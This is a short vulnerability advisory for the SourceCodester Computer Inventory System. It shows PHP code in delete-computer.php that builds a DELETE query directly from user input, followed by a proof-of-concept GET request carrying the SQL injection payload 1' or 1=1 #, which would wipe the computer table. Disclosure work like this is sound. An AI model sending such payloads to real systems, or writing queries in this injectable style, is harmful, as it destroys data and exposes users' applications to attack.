SQL Injection delete-computer.php .md

SOURCECODESTER / Computer Inventory System - delete-computer.php SQL Injection

Credits

Joshua Lictan (https://github.com/skid-nochizplz/skid-nochizplz)

Vendor Homepage:

https://www.sourcecodester.com/php/17165/computer-inventory-system-using-php-and-mysql-source-code.html

Affected Component

/endpoint/delete-computer.php

Code

        $query = "DELETE FROM tbl_computer WHERE tbl_computer_id = '$computer'";

        $stmt = $conn->prepare($query);

        $query_execute = $stmt->execute();

Proof of Concept

HTTP Request Example

GET /endpoint/delete-computer.php?computer=1'+or+1%3d1+%23 HTTP/1.1
Host: 

Screenshot